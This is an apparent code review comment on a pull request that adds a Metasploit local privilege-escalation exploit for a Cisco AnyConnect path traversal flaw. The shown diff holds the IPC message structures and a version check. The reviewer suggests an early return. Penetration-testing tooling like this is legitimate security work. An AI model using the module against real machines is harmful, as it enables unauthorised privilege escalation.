modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb

```diff
@@ -0,0 +1,213 @@
+        'DisclosureDate' => 'Feb 19 2020',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'FileDropperDelay' => 10
+        }
+      )
+    )
+
+    register_advanced_options [
+      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+    ]
+  end
+
+  # See AnyConnect IPC protocol articles:
+  # - https://www.serializing.me/2016/12/14/anyconnect-elevation-of-privileges-part-1/
+  # - https://www.serializing.me/2016/12/20/anyconnect-elevation-of-privileges-part-2/
+  class CIPCHeader < BinData::Record
+    endian :little
+
+    uint32 :id_tag,            label: 'ID Tag', value: 0x4353434f
+    uint16 :header_length,     label: 'Header Length', initial_value: -> { num_bytes }
+    uint16 :data_length,       label: 'Data Length', initial_value: -> { parent.body.num_bytes }
+    uint32 :ipc_repsonse_cb,   label: 'IPC response CB', initial_value: 0xFFFFFFFF
+    uint32 :msg_user_context,  label: 'Message User Context', initial_value: 0x00000000
+    uint32 :request_msg_id,    label: 'Request Message Id', initial_value: 0x00000002
+    uint32 :return_ipc_object, label: 'Return IPC Object', initial_value: 0x00000000
+    uint8  :message_type,      label: 'Message Type', initial_value: 1
+    uint8  :message_id,        label: 'Message ID', initial_value: 2
+  end
+
+  class CIPCTlv < BinData::Record
+    endian :big
+
+    uint8   :msg_type,   label: 'Type'
+    uint8   :msg_index,  label: 'Index'
+    uint16  :msg_length, label: 'Length', initial_value: -> { msg_value.num_bytes }
+    stringz :msg_value,  label: 'Value', length: -> { msg_length }
+  end
+
+  class CIPCMessage < BinData::Record
+    endian :little
+
+    cipc_header :header, label: 'Header'
+    array :body, label: 'Body', type: :cipc_tlv, read_until: :eof
+  end
+
+  def check
+    file_path = nil
+    path = 'Cisco\\Cisco AnyConnect Secure Mobility Client'
+    [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
+      if file_exist?([pf_path, path, 'vpndownloader.exe'].join('\\'))
+        @installation_path = "#{pf_path}\\#{path}"
+        file_path = "#{@installation_path}\\vpndownloader.exe"
+        break
+      end
+    end
+
+    if file_path
+      vprint_status("Found vpndownloader.exe path: '#{file_path}'")
+      version = file_version(file_path)
+      if version
+        patched_version = Gem::Version.new('4.8.02042')
+        @ac_version    = Gem::Version.new(version.join('.'))
+        if @ac_version < patched_version
+          vprint_good("Cisco AnyConnect version #{@ac_version} appears to be vulnerable")
+          return CheckCode::Appears
+        else
+          vprint_error("Cisco AnyConnect version #{@ac_version} is not vulnerable")
+          return CheckCode::Safe
+        end
+      else
+        vprint_warning('Unable to retrieve vpndownloader.exe file version')
+      end
+    else
+      vprint_warning('vpndownloader.exe not found on the file system')
+      return CheckCode::Safe
+    end
```

Comment:
`'vpndownloader.exe not found on the file system'` seems more like an error than a warning. Also, returning early would save some spaghetti.

```suggestion
    unless file_path
      vprint_error('vpndownloader.exe not found on the file system')
      return CheckCode::Safe
    end
    
    vprint_status("Found vpndownloader.exe path: '#{file_path}'")
    version = file_version(file_path)
    if version
      patched_version = Gem::Version.new('4.8.02042')
      @ac_version = Gem::Version.new(version.join('.'))
      if @ac_version < patched_version
        vprint_good("Cisco AnyConnect version #{@ac_version} appears to be vulnerable")
        return CheckCode::Appears
      else
        vprint_error("Cisco AnyConnect version #{@ac_version} is not vulnerable")
        return CheckCode::Safe
      end
    else
      vprint_warning('Unable to retrieve vpndownloader.exe file version')
    end
```